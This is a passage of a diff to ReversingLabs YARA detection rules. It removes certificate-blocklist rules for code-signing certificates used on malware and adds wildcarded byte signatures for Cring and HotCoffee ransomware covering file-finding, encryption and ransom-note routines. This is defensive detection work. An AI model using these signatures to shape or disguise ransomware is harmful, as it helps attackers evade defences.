47 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 + 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? + ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83 + F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? + ?? 66 C7 04 08 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 + 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45 + } + $encrypt_files_p6 = { + 8B BD ?? ?? ?? ?? 8B C7 8B 8D ?? ?? ?? ?? 2B C1 8B 56 ?? 3B D0 76 ?? 8B 46 ?? 2B C2 + 3B C1 72 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 8B CE 50 6A ?? E8 ?? + ?? ?? ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 + ?? ?? ?? ?? C6 00 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? + ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 6A ?? 68 ?? ?? ?? ?? 83 F8 ?? 72 ?? 83 FA ?? + 8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 03 F1 89 85 ?? ?? ?? ?? 56 E8 ?? ?? + ?? ?? 83 C4 ?? C6 46 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 00 0F 11 45 ?? F3 0F 7E 40 ?? 66 + 0F D6 45 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ?? + ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? + 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 + ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? + 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? + ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? + ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 + } + $encrypt_files_p7 = { + FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 + 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? + ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 + ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? + 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? + 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? + 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? + 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B + } + $encrypt_files_p8 = { + 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? + ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 + ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? 66 89 85 ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? + ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 + ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? + 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 + ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 EC ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 + C6 45 ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 E8 ?? ?? + ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? + ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? + ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? + ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 + } + $encrypt_files_p9 = { + 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? + 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 + F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D + ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 + ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 + ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? + 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? + ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 + ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? + 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? + 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 + ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 + 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? + 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3-T TOV" and pe.signatures[i].serial=="43:db:44:48:d8:70:d7:bd:c2:75:f3:6a:01:fb:a3:6f" and 1436227199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_2880A7F7Ff2D334Aa08744A8754Fab2C : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cring : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Cring ransomware." author = "ReversingLabs" - id = "b079b564-9284-59b6-9703-4e33f2b2c44d" - date = "2023-11-08" - modified = "2023-11-08" + id = "76530a6d-145b-5316-8200-4b191d0754fd" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1744-L1760" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "03c7e1251c44e8824ae3b648a95cf34f4c56db65d76806306a062a343981d87f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Cring.yara#L1-L66" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "05cf60ad39c9dcc592345f13b63c99b153b9253297a8ad9e52e0439081d8c796" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Cring" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Garena Online Pte Ltd" and pe.signatures[i].serial=="28:80:a7:f7:ff:2d:33:4a:a0:87:44:a8:75:4f:ab:2c" and 1393891199<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0492F5C18E26Fa0Cd7E15067674Aff1C : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "6a176d4a-5d3e-5184-b923-12d561e7034a" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1762-L1778" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d47d59d7680000d6c35181be2d9b034c2ecb7ca754a39c8e11750ddd7246b47c" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 19 2E ?? 08 6F ?? ?? ?? ?? + 18 33 ?? 08 6F ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 02 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 0D 2B ?? 09 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 6F + ?? ?? ?? ?? DC 07 17 58 0B 07 06 8E 69 32 ?? 2A + } + $find_files_p2 = { + 02 7B ?? ?? ?? ?? 0B 07 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 16 0A DD ?? + ?? ?? ?? 02 15 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? + ?? ?? 14 0C 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 2C + ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 2B ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? + 9A 0D 02 09 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 17 0A DD ?? ?? ?? ?? 02 15 7D ?? ?? ?? + ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 8E 69 + 32 ?? 02 14 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 14 0C 02 7B ?? ?? ?? ?? 28 + ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 39 ?? ?? ?? ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? + ?? 38 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 9A 13 ?? 02 11 ?? 02 7B ?? ?? ?? + ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 1F ?? 7D ?? ?? ?? + ?? 2B ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 7D ?? ?? ?? ?? 02 18 7D ?? ?? + ?? ?? 17 0A DE ?? 02 1F ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 28 + ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? + ?? ?? 02 7B ?? ?? ?? ?? 8E 69 3F ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 16 0A DE ?? 02 28 ?? + ?? ?? ?? DC 06 2A + } + $encrypt_files = { + 16 0A 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 1E 5B 8D ?? ?? ?? ?? 0C 07 6F ?? ?? ?? ?? 1E + 5B 8D ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 08 6F ?? ?? ?? ?? 11 ?? 09 6F ?? ?? ?? + ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 8E 69 09 8E 69 58 8D ?? ?? ?? ?? 13 ?? + 08 11 ?? 08 8E 69 28 ?? ?? ?? ?? 09 16 11 ?? 08 8E 69 09 8E 69 28 ?? ?? ?? ?? 11 ?? 04 + 28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 13 ?? 07 08 09 6F ?? ?? ?? ?? 13 ?? 02 + 19 73 ?? ?? ?? ?? 13 ?? 03 18 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 13 ?? + 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 + ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? + 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F + ?? ?? ?? ?? DC 17 0A DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2A + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ghada Saffarini" and pe.signatures[i].serial=="04:92:f5:c1:8e:26:fa:0c:d7:e1:50:67:67:4a:ff:1c" and 1445990399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6Aa668Cd6A9De1Fdd476Ea8225326937 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Hotcoffee : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects HotCoffee ransomware." author = "ReversingLabs" - id = "bfff2210-8545-594d-8674-243e57e3dd09" - date = "2023-11-08" - modified = "2023-11-08" + id = "11b26b91-96ae-58d3-8a8a-02a3e7d0b82e" + date = "2021-11-25" + modified = "2021-11-25" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1780-L1796" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "706e16995af40a6c9176dcbca07fb406f2efe4d47dbd9629d1a6b1ab1d09b045" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.HotCoffee.yara#L1-L111" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "15ae428c37fcc5a09d324fd9be5a8df3a812e6459cb1ce8eec56eabf785b4c05" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "HotCoffee" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BSCP LIMITED" and pe.signatures[i].serial=="6a:a6:68:cd:6a:9d:e1:fd:d4:76:ea:82:25:32:69:37" and 1441583999<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1Cb06Dccb482255728671Ea12Ac41620 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "5a7f61a4-15ba-5f5c-89e1-b8b986e13f19" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1798-L1814" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e0867ffe2ddd28282fe78b27b3b12ebac525b33a27dd242bc6f55bcd2e066a18" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files = { + 48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0 + 48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ?? + ?? 4C 2B C9 0F 1F 44 00 ?? 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89 + 01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 89 30 + 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ?? 48 8D 44 24 ?? + 48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? BA ?? + ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B 4C 24 ?? 48 3B + C8 74 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 66 39 30 74 ?? 48 83 + C0 ?? 48 83 E9 ?? 75 ?? 48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6 + BA ?? ?? ?? ?? 48 2B D0 48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 + 03 C2 4C 8D 0D ?? ?? ?? ?? 4C 2B C9 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ?? + 66 44 89 01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 + 66 89 30 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 89 + 44 24 ?? 48 83 F8 ?? 75 ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 8D + ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 + 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 + } + $encrypt_files_p1 = { + B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 90 66 83 38 ?? 74 ?? 48 83 C0 ?? 48 83 E9 ?? 75 + ?? 48 85 C9 74 ?? 41 B8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 2B C1 BA ?? ?? ?? ?? 48 + 85 C9 4C 0F 44 C3 4A 8D 04 40 49 2B D0 74 ?? 49 8D 88 ?? ?? ?? ?? 48 03 CA 4C 8D 0D + ?? ?? ?? ?? 4C 2B C8 66 90 48 85 C9 74 ?? 45 0F B7 04 01 66 45 85 C0 74 ?? 66 44 89 + 00 48 FF C9 48 83 C0 ?? 48 83 EA ?? 75 ?? 48 85 D2 48 8D 48 ?? 48 0F 45 C8 66 89 19 + 48 89 5C 24 ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ?? 44 8B C7 8B D7 C7 44 24 ?? ?? ?? ?? + ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D + 8D ?? ?? ?? ?? 44 8B C7 C7 44 24 ?? ?? ?? ?? ?? 48 8B F0 41 8D 51 ?? FF 15 ?? ?? ?? + ?? 41 B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ?? + ?? ?? ?? 4C 8B F0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 41 B9 ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45 + } + $encrypt_files_p2 = { + 33 C0 BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B + 15 ?? ?? ?? ?? 45 33 C9 48 8B 8D ?? ?? ?? ?? 44 8B C0 FF 15 ?? ?? ?? ?? 4C 8B 85 ?? + ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 44 8B CF BA ?? ?? ?? ?? 48 89 44 + 24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 32 DB 41 BD ?? ?? ?? ?? 48 + 8B F8 66 66 66 0F 1F 84 00 ?? ?? 00 00 4C 8D 8D ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? + ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8B CE FF 15 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? + ?? 48 8D 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? + 0F B6 DB 41 0F 42 DD 48 89 7C 24 ?? 44 0F B6 C3 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 44 + 8B 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D7 48 C7 44 24 ?? ?? ?? ?? ?? 49 8B CE + FF 15 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 4C 8B 6C 24 ?? 48 85 F6 74 ?? 48 8B CE FF + 15 ?? ?? ?? ?? 4D 85 F6 + } + $drop_ransom_note = { + 48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 49 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0 + 48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ?? + ?? 4C 2B C9 66 90 48 85 C0 74 ?? 46 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89 01 48 83 + C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 44 89 30 4C 89 + 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? + ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 49 C7 C0 ?? ?? ?? ?? 49 FF C0 + 46 38 34 06 75 ?? 4C 89 74 24 ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D6 